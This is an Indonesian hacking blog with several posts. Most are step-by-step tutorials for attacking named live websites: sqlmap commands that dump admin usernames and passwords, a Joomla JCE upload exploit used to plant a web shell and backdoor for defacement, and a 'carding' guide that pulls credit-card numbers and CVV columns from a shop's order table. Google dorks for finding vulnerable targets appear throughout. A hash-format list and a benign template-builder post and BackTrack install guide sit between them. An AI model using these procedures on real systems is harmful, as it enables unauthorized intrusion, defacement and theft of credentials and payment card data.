Sunday, April 6, 2014

Jenis Hash Password

0 comments





Keterangan: Hash Adalah pensensor password biasanya untuk website atau sebagainya! untuk merubah password di barcode melalui symlink terutama untuk deface & hacking Website :)
Dan ini adalah jenis - jenis Hash yang harus anda ketahui bagi para hacking dan defacing xD


1. DES(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 13 Karakter.

[+] Deskripsi : Dua karakter pertama adalah salt (Karakter acak, di contoh kita saltnya adalah string "Iv.") kemudian diikuti oleh Hashnya.

[+] Contoh : IvS7aeT4NzQPM

2. Domain Cached Credentials

[+] Digunakan untuk mencache password-password domain windows.

[+] Panjang : 16 bytes (32 Karakter)

[+] Algorithm : MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

[+] Contoh : Admin:b474d48cdfc4974d86ef4d24904cdd91

3. MD5(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 34 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $1$ kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678") kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.

[+] Contoh : $1$12345678$XM4P3PrKBgKNnTaqG9P0T/

4. MD5(APR)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 37 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $apr1$ , kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.

[+] Contoh : $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.

5. MD5(phpBB3)

[+] Digunakan di phpBB 3.x.x.

[+] Panjang : 37 Karakter.

[+] Dekripsi : Hash dimulai dengan tanda $H$ kemudian diikuti dengan satu karakter (paling sering angka "9") kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2048 kali.

[+] Contoh : $H$9123456785DAERgALpsri.D9z3ht120

6. MD5(Wordpress)

[+] Digunakan di Wordpress.

[+] Panjang : 34 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $P$ , kemudian diikuti dengan satu karakter (Paling sering huruf "B"), kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 8192 kali.

[+] Contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

7. MySQL

[+] Digunakan di MySQL versi lama.

[+] Panjang : 8 bytes.

[+] Deskripsi : Hash yang terdiri dari dua DWORD, masing-masing tidak melebihi nilai 0x7fffffff.

[+] Contoh : 606717496665bcba

8. MySQL5

[+] Digunakan di MySQL Versi baru.

[+] Panjang : 20 bytes.

[+] Algorithm : SHA-1(SHA-1($pass))

[+] Contoh : *E6CC90B878B948C35E92B003C792C46C58C4AF40

[+] Catatan : Hash harus dimuat ke program tanpa tanda bintang (*) yang terdapat di awal setiap hash.

9. RAdmin v2.x

[+] Digunakan di Aplikasi Remote Administrator v2.x.

[+] Panjang : 16 bytes.

[+] Algorithm : Password diisi dengan nol dengan panjang 100 bytes, kemudian seluruh string dihash dengan algoritma MD5.

[+] Contoh : 5e32cceaafed5cc80866737dfb212d7f

10. MD5

[+] Digunakan di phpBB v2.x, Joomla versi di bawah 1.0.13 dan banyak forum dan CMS.

[+] Panjang : 16 bytes.

[+] Algorithm : sama seperti fungsi md5() di php.

[+] Contoh : c4ca4238a0b923820dcc509a6f75849b

11. md5($pass.$salt)

[+] Digunakan di WB News, Joomla Versi 1.0.13 keatas.

[+] Panjang : 16 bytes

[+] contoh : 6f04f0d75f6870858bae14ac0b6d9f73:1234

12. md5($salt.$pass)

[+] Digunakan di osCommerce, AEF, Gallery dan beberapa CMS.

[+] Panjang : 16 bytes.

[+] Contoh : f190ce9ac8445d249747cab7be43f7d5:12

13. md5(md5($pass))

[+] Digunakan di e107, DLE, AVE, Diferior, Koobi dan beberapa CMS.

[+] Panjang : 16 bytes.

[+] Contoh : 28c8edde3d61a0411511d3b1866f0636

14. md5(md5($pass).$salt)

[+] Digunakan di vBulletin, IceBB.

[+] Panjang ; 16 bytes.

[+] Contoh : 6011527690eddca23580955c216b1fd2:wQ6

15. md5(md5($salt).md5($pass))

[+] Digunakan di IPB.

[+] Panjang : 16 bytes.

[+] Contoh : 81f87275dd805aa018df8befe09fe9f8:wH6_S

16. md5(md5($salt).$pass)

[+] Digunakan di MyBB.

[+] Panjang : 16 bytes.

[+] Contoh : 816a14db44578f516cbaef25bd8d8296:1234

17. md5($salt.$pass.$salt)

[+] Digunakan di TBDev.

[+] Panjang : 16 bytes.

[+] Contoh : a3bc9e11fddf4fef4deea11e33668eab:1234

18. md5($salt.md5($salt.$pass))

[+] Digunakan di DLP.

[+] Panjang : 16 bytes.

[+] Contoh : 1d715e52285e5a6b546e442792652c8a:1234

20. SHA-1[+] Digunakan dibanyak Forum dan CMS.

[+] Panjang : 20 bytes

[+] Algorithm: Sama dengan sha1() fungsi di PHP.

[+] Contoh : 356a192b7913b04c54574d18c28d46e6395428ab

21. sha1(strtolower($username).$pass)

[+] Digunakan di SMF

[+] Panjang : 20 bytes.

[+] Contoh : Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a

22. sha1($salt.sha1($salt.sha1($pass)))

[+] Digunakan di Woltlab BB

[+] Panjang : 20 bytes

[+] Contoh : cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234

23. SHA-256(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 55 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $5$, kemudian diikuti salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-256 5000 kali.

[+] Contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

24. SHA-512(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 98 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $6$, kemudian diikuti dengan salt (sampai dengan 8 karakter acak, dicontoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-512 5000 kali.

[+] contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm itulah beberapa jenis pasword yang ada dan digunakan.
semoga dapat membantu bagi para pembaca bloger sekalian.
Continue reading →
Tuesday, April 1, 2014

Hacking Website dengan SQLMap di Kali Linux

1 comments

sebelumnya, apa itu sqlmap……???
sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.
pertama yang harus kita lakukan, adalah mencari website yang terdapat Vuln sql injection. :)
bisa juga dengan google dork untuk mencari website vulnr.
penulis ada kumpulan dork sql injection silahkan download:
dork sql injection 2014

penulis mengunakan live target "http://www.solutionpack.my/products.php?id=9"
1. buka termnal…


2. inilah perbedaannya danga backtrack, kita tidak harus menuju folder sqlmap terlebih dahulu untuk menjalankanya tetapi langsung kita ketikkan perintah berikut :

root@maverick#sqlmap -u http://www.solutionpack.my/products.php?id=9 --dbs


3. terlihat ada 2 database :
[*] information_schema
[*] solution_newgads

selanjutnya kita cari tabel yang ada di database solution_newgads

dengan perintah

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads --tables


4. akan muncul nama-nama kolom dari database tersebut, lalau kita cari isi kolom yang berisi username dan password admin…dengan perinth berikut
  
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin --columns
5. untuk melihat isi dari kolom dari username dan pasword tersebut tuliskan perintah:

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin -C  username,password --dump


binggooo kita dapet username sama passwordnya ..........
terkahir kalau sudah mendapatkan paswd dan user admin tinggal cari halaman login, tapi bisnya passwordnya di enkripsi jdi harus di decrypte terlebih dahulu.
sekian tutorial dari saya.....sebagai pembelajaran.
tetap semangat...... keep learn,keep silent coz silent is deadly attack.
hahahaa.
Continue reading →
Sunday, March 30, 2014

Exploit Joomla JCE Server Scaner dan JCE Tools Uploder

0 comments

Lagi rame nih Deface website pakai tool JCE uploder dan JCE Exploit Tool

sebenarnya alat perang yang sering di gunakan ada 2 macam, yang format perl dan php .

kali ini saya mau share yang Perl dan Php



dork (bisa di kembangin lagi)  :
     inurl:"joomla/index.php?option=com_virtuemart"
     inurl:"joomla/index.php?option=com_jce"
     inurl:"index.php?option=com_jce"
     inurl:"index.php?option=com_virtuemart"
     inurl:"uk/index.php?option=com_virtuemart"

lanjut caranya :

1. buka lewat localhost xamp ato yang gampang upload aja lewat shell

2. lalu akses filenya, maka akan nampak seperti ini :

download JCE uploder shell
save ext php

ket :
Hostname : Web Target ( Tanpa http: dan slash / )
Path : / atau /path/ (kalo ada pathnya)
Please Specify a file to upload : tempat upload shellmu

3. upload shellmu >> klik "start", kalo berhasil alamat shell akan tertera disitu,
kalo failed cari target lain.

Untuk Tool JCE server exploiter dan scaner



download JCE server exploit scaner
save ext perl atau bash



saya tidak bertanggung jawab atas  apa yang anda lakukan, ini hanya untuk materi pembelajaran saja

Continue reading →
Friday, March 28, 2014

Exploit Joomla JCE Remote File Upload Vulnerability

0 comments
Wordpress dan Joomla. Ya, kedua CMS itu memang yang paling banyak terdapat bug yang bisa dideface lewat exploit exploit sederhana. Dan kali ini saya akan share cara mudah deface web CMS Joomla dengan Exploit Joomla JCE Remote File Upload Vulnerability. Tentu saja dengan kreatifitas kalian dalam mengolah dork.  Oke langsung saja.
Bahan-bahan :

JCE Exploiter:  download               Pass rar (slawinymouz)

Google Dork : inurl:index.php?option=com_jce . Use your brain. Kembangin sendiri dorknya. :

Langkah-langkah.
Pertama, cari target di Google dengan dork diatas. Cari satu-satu. Yang sabar. Untuk tutorial ini target saya adalah http://defelsko.su/ .
Buka Tools Joomla Exploiter [ JCE.exe ] , masukkan web target lalu klik start. Lihat SS :

Step 1
Tunggu sampai proses upload selesai. Jika target memang vuln, maka akan muncul link seperti di Screenshoot berikut :
Step 2
Jika tidak ada berarti target tidak vuln Cari web lain.
Jika muncul link seperti di SS, tinggal kita buka link yang tertera disitu. :) .
http://[site]/images/stories/3xp.php
Maka akan muncul Uploader. Kalian bisa mengupload Backdoor lewat situ. Lihat SS :
Step 3
Biasanya bisa upload file .php , namun ada beberapa web yang gagal saat upload file .php . Jika gagal, coba upload file html atau txt . :)
Kali ini saya coba upload Backdoor .php dan berhasil. Jika berhasil akan ada notice Upload ok :d !!! . Lihat SS :
Step 4
Oke, sekarang tinggal kita buka Backdoornya. Tinggal ubah 3xp.php di url menjadi namashell.php . Sehingga menjadi [site]/images/stories/namashell.php .
Buka Backdoornya :)
Our Privat Shell. :)
Kalau sudah begitu ya terserah mau diapain. Langsung cari indexnya, tebas 
Continue reading →

Membuat Template Blog Sendiri

0 comments
Bagi yang suka otak atik template blog ni ane punya aplikasinya agar kalian lebih mudah, dengan aplikasi ini Anda dapat membuat template blog sesuai keinginan sendiri dan tanpa perlu terkoneksi internet.

Untuk membuat template menggunakan aplikasi ini, Anda tidak harus ahli dalam kode html melainkan cukup dengan kreatifitas dan keseriusan Anda dalam membuat template.

Oya.. dari tadi saya belum menyebutkan nama aplikasinya, mau tau ??
Nama aplikasinya adalah WYSIWYG Web Builder, WYSIWYG adalah singkatan dari What You See Is What YouGet yang artinya Apa Yang Anda Lihat Adalah Apa Yang Anda Dapatkan.

                                                                     Screenshot :




Salah satu fitur dari aplikasi ini adalah Anda bisa pratinjau template buatan Anda menggunakan browser langsung, misalnya Mozilla Firefox, Google Crome dll.

                                                                       Screenshot :

 

Fitur lainnya adalah jika Anda sudah selesai membuat template, maka Anda akan mendapatkan kode HTMLnya secara otomatis, aplikasi ini juga menyediakan banyak perlengkapan untuk template blog misalnya, pembuat banner, css menu, teksbox, marquee, video youtube dan masih banyak lagi.

Oke.. jika Anda penasaran ingin mencobanya, silahkan download melalui link dibawah ini :

Ukuran File : 5.4 Mb

Terimakasih atas kunjungan Anda , Semoga Artikel ini bermanfaat

Selamat Mencoba !!!
Continue reading →

Cara Menginstall BackTrack 5 R3 Dual Boot Dengan Windows

0 comments

Sebelum kita mulai kita harus mengosongkan satu partisi yang akan kita tempatkan untuk menginstall BackTrack ini minimal 20 GB biar ada ruang yang digunakan untuk menginstall aplikasi-aplikasi kebutuhan kita, karena File System besarnya mencapai 11 GB.
Oke pertama-tama siapkan dulu CD BackTrack 5 r3 atau bisa juga menggunakan Flashdisk sebagai pengganti CD. Kalau belum punya silahkan download aja langsung dari situs resminyadisini dan cara downloadnya disini
Oke setelah semuanya kelar masukkan CD Installer atau kalau menggunakan flashdisk colokkan flashdisknya. Lalu booting melalui CD/Flashdisk. Lalu tunggu sebentar sampai keluar tulisan "boot" lalu tekan Enter setelah itu tunggu lagi sampai keluar seperti gambar berikut :
Setelah keluar tampilan seperti diatas pilih saja "BackTrack Text - Default Boot Text Mode" atau yang paling atas kemudian tunggu sebentar sampai keluar tampilan berikut :
Kemudian ketikkan "startx" tanpa tanda petik seperti gambar diatas lalu tekan enter. dan tunggu lagi sampai prosesnya selesai.
dan munculah tampilan seperti diatas. Di klik saja.
di klik lagi.
atur lokasi sesuai dengan waktu ditempat anda bila anda berada di wilayah WIB pilih saja "Indonesia (Jakarta)" jika WIT pilih "Indonesia (Pontianak)" dan jika WITA pilih saja "Indonesia (Makassar)" lalu forward.
dibiarkan saja klik forward lagi.

lalu pilih saja "Specify partitions manually (advanced)" supaya kita yang akan menentukan di partisi mana kita akan menginstallnya. oke forward lagi.
nah disini kita akan menentukan di partisi mana kita akan menginstallnya. seperti gambar diatas, saya sudah mengosongkan satu partisi. oke sekarang klik saja "Add" kemudian keluar tampilan seperti berikut :
dibagian 'Type for the new partition' pilih saja "Logical" dan di 'Location for the new partition' pilih saja "End" supaya partisinya berada di paling akhir karena kalu kita pilih "Beginning" partisinya akan berada di paling awal, di bagian 'Use as' pilih "Ext4 journalling file system" karena kalau kita menggunakan "NTFS" backtracknya tidak akan bisa booting, sebab file system Linux dengan Windows itu berbeda tidak sama seperti Windows yang menggunakan format "NTFS". kemudian pada 'Mount point' pilih saja "/" supaya bootingnya bisa lancar dan bisa langsung dual boot dengan Windows. klik OK dan klik forward lagi.
dicentang saja seperti gambar diatas kli forward lagi.
klik Continue.
langsung klik Install.
dan tunggu sampai prosesnya selesai setelah selesai klik saja Restart biar langsung bisa dicoba tanpa menggunakan Live CD.
Oke sekian tutorial ini saya buat semoga bermanfaat.
Wassalam.
Continue reading →

TUTORIAL CARDING ( WITH CARDING DORK & SQLMAP KALI LINUX)

0 comments

Ok Langsung Aja Ke Tkp


1. sqlmap
2. dork carding (download)

3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :




Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="


Nah, web tersebut error saat kita inject ,



Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u (Url) --dbs

Disini kita mendapatkan 3 database :

[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema


Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u (url) -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :



Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 




Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+


Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .




Semoga bermanfaat :)
Continue reading →